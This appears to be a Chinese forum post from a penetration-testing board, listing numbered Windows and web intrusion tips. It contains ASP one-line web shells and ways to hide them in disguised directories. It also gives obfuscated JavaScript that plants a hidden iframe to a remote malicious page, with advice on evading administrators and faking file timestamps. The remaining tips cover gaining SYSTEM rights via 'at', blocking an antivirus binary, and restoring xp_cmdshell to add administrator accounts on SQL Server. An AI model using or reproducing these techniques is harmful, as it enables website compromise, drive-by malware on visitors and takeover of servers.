1 S0 O. Y. ]. i: L+ i" v* a4 U1 @
f).<%if request("cmd")<>"" then execute request("pass")%>
8 P& ^3 ?. M# Q: S3 W
9 t* K* D/ z1 ]' @) A
52、at "12:17" /interactive cmd
4 y3 Y8 R C B1 j/ J
执行后可以用AT命令查看新加的任务
7 c4 K9 P. l) v8 a3 k6 a/ k
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
1 Z" u o& b/ Q: I0 s2 _- `
) O! K P7 e: @- v
53、隐藏ASP后门的两种方法
+ y! ^6 g/ `( d( Z9 k( T9 ~5 \
1、建立非标准目录:mkdir images..\
8 p, B8 Q9 _( e4 L% F6 ?6 D* G( u
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
8 m3 i' d, ~! h( E, `. `* \9 C9 d1 r Z
通过web访问ASP木马:http://ip/images../news.asp?action=login
6 Y& i, T+ ]# N4 h
如何删除非标准目录:rmdir images..\ /s
+ j5 K4 |; j/ F9 k3 R- h5 R: B
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
* q3 P$ e. X/ [1 G& K
mkdir programme.asp
0 s' h$ }8 E* c; z
新建1.txt文件内容:<!--#include file=”12.jpg”-->
# [ `( u! x- G: ?8 v
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
1 A5 T. S3 e) h! t% j' ^+ X
attrib +H +S programme.asp
' _9 U- A, j# Y7 M$ @- x# Y$ L! t
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
8 w1 q7 Q: o/ x0 b) u* e7 C# m ^
3 _$ Q8 U9 j; _5 x. j
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
1 W) }: f! e; r; |5 V: ]9 J+ X
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
' S# @4 x0 ]$ q& D
. f. h( v4 \0 O$ s$ A! T% {5 P
55、JS隐蔽挂马
4 H: G: J L# s" H0 Q. w! x
1.
- |+ `# R' l9 V; G9 y
var tr4c3="<iframe src=ht";
: I1 O2 P( c7 b- F5 _7 r4 k, O) A
tr4c3 = tr4c3+"tp:/";
7 g+ `' q' d; x& @- o: t
tr4c3 = tr4c3+"/ww";
, s1 G# e5 z( d) u6 p1 ]
tr4c3 = tr4c3+"w.tr4";
# K3 b) V V0 F1 o3 K- b
tr4c3 = tr4c3+"c3.com/inc/m";
8 d0 f4 E6 _. ]* Z
tr4c3 = tr4c3+"m.htm style="display:none"></i";
9 j6 e1 L, T) _1 _2 A
tr4c3 =tr4c3+"frame>'";
( F. }" |/ z6 H. r2 R- W0 r# m
document.write(tr4c3);
; H! h2 b0 S* i; a
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
2 a9 N+ D. O; x2 b0 h- U
8 a" l+ i. ^: n! }
2.
4 S+ G1 V m% @+ k8 E
转换进制,然后用EVAL执行。如
6 i/ h* K3 b. Y2 ?1 U. K' \ T
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
1 Y$ [* Z5 N4 N$ }' d
不过这个有点显眼。
# Z7 w# p8 _5 g) D) h$ g) p) F! j
3.
( m( o0 E0 F' m, h/ h
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
3 K7 G) h4 n V D
最后一点,别忘了把文件的时间也修改下。
. Y T- S9 C7 I! C( Y/ @/ ^
# I7 ]3 c- A G) f2 M
56.3389终端入侵常用DOS命令
* k5 k6 Y5 S3 U# m. }
taskkill taskkill /PID 1248 /t
# ^: r+ |8 u6 q2 |- K% @
: a( o, ?$ [) D" s
tasklist 查进程
0 _4 ]- k2 a: l0 E% y" X3 h! S. i
; a' r6 q5 \% t& o6 G
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
2 C0 p* n" ^5 t/ L
iisreset /reboot
! G) r1 Y* `% Z8 x: [9 r
tsshutdn /reboot /delay:1 重起服务器
) b+ s5 _* N6 ~" H# Q! u
K" e& a& n5 b
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
* a. f8 `( J' _8 k8 |+ S0 e- G
7 D r* D4 l/ Y+ z3 A! I2 e# v
query user 查看当前终端用户在线情况
( P* j& e0 E+ Q% a
% ^$ X. l" S, ]$ v4 i
要显示有关所有会话使用的进程的信息,请键入:query process *
* A9 G4 y* x" x9 q' I7 i7 d9 ?
- R+ K$ z# D2 A4 M, T
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
7 u7 z$ J$ _& x% Y- l7 F# {' e3 d
, W; N: B$ a! G1 c) q' L
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
9 _$ ?9 [( }4 v2 k" E: w m
9 D/ j5 p/ [7 C& F& n
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
4 [, p% [5 z. H- b2 s
- n1 O. M+ X5 v% L$ L Z
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
2 r- |& h. S f# }+ K
% Z) z- R1 v* ?
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
. {1 K# U5 s/ ~& D) j
0 T4 g4 J- _0 Q a
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
) e7 o; B" x4 q. ]( i
K2 Z2 v: h! ^- X" N! P/ f
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
7 w! v9 h" b5 v( y% T' r8 ?
8 N# Y& j2 p9 T
56、在地址栏或按Ctrl+O,输入:
! u7 W5 q* n- L; C+ g$ m
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
" c. {8 ?1 L t9 D% w0 D3 ^% T
, f& h: w5 I* w# h& E
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
# ~4 K5 ^ R* a2 _
- J \( _ `$ j4 J/ \
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
- y; E3 @$ b7 Z( x# o
用net localgroup administrators是可以看到管理组下,加了$的用户的。
1 i/ H3 Y$ ^! U3 K T: u8 p
# G w4 e$ R6 Q4 _/ n
58、 sa弱口令相关命令
+ ?3 E# c4 ]* }$ Y5 M1 o' v/ A
( f7 @9 W' B) v2 V @
一.更改sa口令方法:
& z* b/ X6 p( m9 I8 Y( ?5 l7 U
用sql综合利用工具连接后,执行命令:
5 }- A* t' t# D/ a) g& j% Z; p' y4 }
exec sp_password NULL,'20001001','sa'
( V: W1 j: I- E7 t
(提示:慎用!)
0 X( P t7 H, o: ]
; h- n6 y+ `% i2 w
二.简单修补sa弱口令.
- Q: m8 C5 `, D' k
' d+ ^5 T0 S1 w/ O
方法1:查询分离器连接后执行:
" b# D2 S T4 Z( g/ C) q
if exists (select * from
/ P- S) e4 V8 i: M( |# k4 z9 S8 c
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
3 W: |+ x+ T! s( P
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
$ Z/ W3 X( p* ]: b
9 y& D9 r! s8 [
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
- f/ u, z4 a6 \
8 W& v4 M K- }2 i/ J
GO
2 Z2 v$ P: D" H: Z8 s) c
# ^7 `4 Z% a9 `, M7 u) } p
然后按F5键命令执行完毕
2 [4 {( L4 Z5 T5 K$ V* d
! q. q. D3 I$ ], n
方法2:查询分离器连接后
: b" X: v: u: R1 y h1 L
第一步执行:use master
6 I& _8 v* m: j8 g) H# W9 ^4 N
第二步执行:sp_dropextendedproc 'xp_cmdshell'
2 K! r# Z) Y: ]4 D6 u
然后按F5键命令执行完毕
, u+ N0 r7 k: ~) {1 u4 _6 @# V
- ]: x0 m( E* p, U
/ Q1 d- m# T! x& C" o! M
三.常见情况恢复执行xp_cmdshell.
- S8 V( U) ]1 D4 b9 D6 Q6 J. A
0 {/ j) Q* z: x+ s/ E- ~! `* f) \
4 a0 t) b; D1 h* s: ^+ x5 \ C3 o# F
1 未能找到存储过程'master..xpcmdshell'.
% m2 E# v% t. X, b" O4 y
恢复方法:查询分离器连接后,
. D. T8 C1 f+ S6 z0 ^& f4 v
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
6 C8 i4 T# ]* _. k8 p* x% i
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
& x$ m4 L8 F& E! n+ m" }+ i0 f
然后按F5键命令执行完毕
9 p6 |0 J( t3 K0 p9 } t+ E' T8 q( h
' N3 z6 a9 D& M* b
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
. \$ `6 ~; @4 h7 E& T8 i% y4 n T
恢复方法:查询分离器连接后,
0 Q$ L# T2 a' D% n9 t
第一步执行:sp_dropextendedproc "xp_cmdshell"
! n/ D6 {4 c! l3 H5 V9 ` ?2 Y) z
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
3 i. ?3 J% I1 V/ F2 i/ R
然后按F5键命令执行完毕
" S: F0 Z% ^, c; m
/ N) p2 V- [4 f- S9 B
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
/ M5 E* I P5 S/ x8 h3 G& X9 b6 o
恢复方法:查询分离器连接后,
$ q% g( n9 O2 F6 U
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
- H4 v. @* S! n
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
% ?5 s; J; k% `3 l
然后按F5键命令执行完毕
) B3 s5 q4 ?5 F( ?3 K+ E( ^
3 U) ]% Z; G5 f; n1 J. s
四.终极方法.
" Y' \6 \3 B6 U
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
7 O2 M( P8 L& D2 I
查询分离器连接后,
0 N o* f' l$ T* o* X% \2 p0 V% A
2000servser系统:
$ ^+ D1 @* i! F, p- F
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
6 ^) v; Y3 _& d( K8 l! `: O
1 i$ M. ?, {% c! n, }
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
1 H0 B; V* x1 P# Y4 K
3 w. }* v6 j$ v* e) H5 S2 v
xp或2003server系统:
$ c2 W+ T \8 ^0 i) H& N
4 T8 r+ z' A0 C% v
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
$ R3 L' j: i3 _" l
/ D/ I0 p0 ] X Y5 L
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
! s& i2 r o2 h+ X( P
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2